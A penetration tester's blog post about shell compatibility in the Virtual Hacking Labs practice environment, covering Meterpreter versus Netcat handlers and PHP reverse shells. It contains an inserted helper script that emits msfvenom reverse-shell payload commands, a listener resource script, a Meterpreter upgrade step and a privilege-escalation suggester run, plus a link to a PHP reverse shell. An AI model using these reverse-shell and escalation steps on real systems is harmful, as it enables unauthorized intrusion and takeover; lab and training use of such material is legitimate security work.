Compatibility issues between different shells and handlers
When I work through the machines in Virtual Hacking Labs, one of the issues that causes me the most pain is compatibility between different environments: Windows, Linux, 64-bit, 32-bit; I have even dealt with an ARM64 Windows 10.
Therefore, making my scripts work on the targets is a real challenge. I do most of my hacking from Kali Linux. Kali ships "mingw" (the MinGW-w64 cross-compiler), which solves part of the problem but not all of it. Not to mention that my CPU is x86_64, while ARM CPUs are becoming more and more popular.
Shell compatibility is also a very tricky problem. I understand that for most entry-level hackers, getting a shell on a victim, which means being able to run any command they wish, is very exciting. However, getting a shell is not everything. It is only an initial foothold for further attacks such as privilege escalation, Active Directory attacks, and attacking hidden networks.
At that point, handling the shell properly is essential. Most junior penetration testers overlook this, since there are almost no resources on the Internet that talk about it.
One of the shells I like most is the Meterpreter shell, since it works perfectly with Metasploit. It also has many additional functions that save me a lot of time compared with doing things manually. One I recommend strongly is the privilege-escalation suggester (post/multi/recon/local_exploit_suggester). I abuse it heavily when I am targeting aged operating systems, and by "aged" I mean released two or three years ago! Sometimes it is a lifesaver. It is good at exploiting kernel vulnerabilities: if I cannot find any misconfiguration to escalate privileges manually, I use it to quickly exhaust the potential kernel vulnerabilities. And once I have a Meterpreter reverse_tcp shell, I no longer need to worry about compatibility. I highly respect the people who do everything manually instead of using these tools. However, my goal is to root two machines every day, and I simply do not have enough time to research every vulnerability I meet. Even the OSCP allows me to hack one box with Metasploit.
However, most of the initial shells I get are not Meterpreter reverse_tcp shells. Metasploit has a module (post/multi/manage/shell_to_meterpreter) to upgrade the initial shell to a Meterpreter shell, but it fails most of the time. Sometimes it succeeds but gives me a 32-bit Meterpreter shell, while both my Kali and the target are running 64-bit systems.
The output of a 32-bit Meterpreter reverse_tcp shell.
The output of a 64-bit Meterpreter reverse_tcp shell that I generated manually, with the following commands.
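As an added example (not the commands from the original post): a small POSIX shell helper that picks the Meterpreter payload matching the target's OS and architecture, emits the msfvenom command and a matching multi/handler resource script, and writes the resource scripts for the local exploit suggester mentioned above and for shell_to_meterpreter with PAYLOAD_OVERRIDE set, which is the option that stops the upgrade module from falling back to its 32-bit default. The address 10.10.14.5 and ports 4444/4445 are placeholders, and the supported OS/arch list is limited to payloads I am certain exist; anything else is rejected rather than guessed.

```shell
#!/bin/sh
# Added example, not code from the original post. Generates matching
# msfvenom / msfconsole artifacts so the payload architecture always matches
# the handler. LHOST/LPORT values below are placeholders.
set -e

# pick_payload OS ARCH -> staged meterpreter/reverse_tcp payload name
pick_payload() {
  case "$1/$2" in
    windows/x86)   echo "windows/meterpreter/reverse_tcp" ;;
    windows/x64)   echo "windows/x64/meterpreter/reverse_tcp" ;;
    linux/x86)     echo "linux/x86/meterpreter/reverse_tcp" ;;
    linux/x64)     echo "linux/x64/meterpreter/reverse_tcp" ;;
    linux/aarch64) echo "linux/aarch64/meterpreter/reverse_tcp" ;;
    *) echo "unsupported target: $1/$2" >&2; return 1 ;;
  esac
}

# output_format OS -> value for msfvenom -f
output_format() {
  case "$1" in
    windows) echo exe ;;
    linux)   echo elf ;;
    *) echo "unsupported OS: $1" >&2; return 1 ;;
  esac
}

# msfvenom_cmd OS ARCH LHOST LPORT OUTFILE -> the msfvenom command line
msfvenom_cmd() {
  payload=$(pick_payload "$1" "$2")
  fmt=$(output_format "$1")
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' \
    "$payload" "$3" "$4" "$fmt" "$5"
}

# handler_rc OS ARCH LHOST LPORT -> msfconsole resource script for the listener
handler_rc() {
  payload=$(pick_payload "$1" "$2")
  cat <<EOF
use exploit/multi/handler
set payload $payload
set LHOST $3
set LPORT $4
set ExitOnSession false
exploit -j
EOF
}

# shell_to_meterpreter_rc SESSION OS ARCH LHOST LPORT -> resource script that
# upgrades an existing plain shell session; PAYLOAD_OVERRIDE forces the stager
# for the real architecture instead of the module's 32-bit default.
shell_to_meterpreter_rc() {
  payload=$(pick_payload "$2" "$3")
  cat <<EOF
use post/multi/manage/shell_to_meterpreter
set SESSION $1
set LHOST $4
set LPORT $5
set PAYLOAD_OVERRIDE $payload
run
EOF
}

# suggester_rc SESSION -> resource script for the local exploit suggester
suggester_rc() {
  cat <<EOF
use post/multi/recon/local_exploit_suggester
set SESSION $1
set SHOWDESCRIPTION true
run
EOF
}

# Usage: sh gen_meterpreter.sh OS ARCH LHOST LPORT
# Prints the msfvenom command and writes handler.rc, upgrade.rc, suggest.rc.
if [ "$#" -eq 4 ]; then
  msfvenom_cmd "$1" "$2" "$3" "$4" "shell.$(output_format "$1")"
  handler_rc "$1" "$2" "$3" "$4" > handler.rc
  shell_to_meterpreter_rc 1 "$1" "$2" "$3" 4445 > upgrade.rc
  suggester_rc 1 > suggest.rc
  echo "run: msfconsole -q -r handler.rc"
fi
```

Run the generated msfvenom command, start msfconsole with handler.rc, deliver the binary, and the session that comes back is a 64-bit Meterpreter when the target is x64. If you only have a plain shell session, `resource upgrade.rc` inside msfconsole upgrades it with the correct architecture, and `resource suggest.rc` runs the suggester against session 1.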
The difference between the php/meterpreter and meterpreter/reverse_tcp payloads.
Remember! If your initial shell was generated by another, rarer payload, especially PHP, you should convert it to one of the two most common formats (a Meterpreter shell or a plain bash reverse shell) immediately. PHP is extremely good at creating vulnerabilities and bugs. Even the best PHP reverse shell, pentestmonkey's, has bugs! The connection from pentestmonkey's PHP reverse shell, caught by a Netcat handler, is stable. However, when you need to upgrade it to a fully functional stty shell, it does not work!
The link to pentestmonkey's shell:
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
The Meterpreter shell is very powerful and can deal with many situations. Nevertheless, it cannot deal with everything, because Meterpreter is designed to hack other machines, not our own. If Meterpreter also ran code on my Kali Linux to configure something, I would not be comfortable with it, and I suppose most hackers would not be happy either.
However, sometimes we need to customize our own machine too. In most cases, if we need to use the default text editors of most Linux machines, such as vi or nano, we have to configure the bash on our end (terminal type, rows and columns, raw mode) to be compatible with the bash on the victim's end. Meterpreter cannot do this properly, since it only deals with the victim's end.
At that point I use the Netcat handler a lot. Be careful: the Netcat handler should be started from bash, while the default shell of Kali Linux is Zsh. In addition, to make the Netcat handler work well, I highly recommend regenerating the shell code with the following commands.
I know that some Python one-liners also work well with the Netcat handler. However, there are many kinds of Python one-liners. To eliminate every possible incompatibility, I stick to the most common payloads.
For Windows systems you can do something similar. The good news on Windows is that in most cases you have PowerShell. That is why I hate Windows XP! It is vulnerable, but it has no PowerShell, and it has too many incompatibility issues because it is so old.
Then you can do the rest by following the blog.
Notice that the blog was released five years ago. At that time bash was the default shell on attacking machines, which is why it does not mention converting from Zsh to bash first.
I have seen a lot of people in various blogs stating that machine XXXX was so easy and that they could root it in ten minutes. I believe they are telling the truth: they can root it in ten minutes, while it might take me hours. But a few people who believe they are cyber security professionals, even with years of blue-team experience and good salaries, would never be able to root a single machine. There are so many details, and just one of them can ruin everything.
Some people believe vulnerability scanners can handle everything. They do not know that there are millions of vulnerability exploits on GitHub, and only very few of them work with little customization such as changing the IP address and port. Some of them even need to be debugged. Can a scanner do that? I don't think so.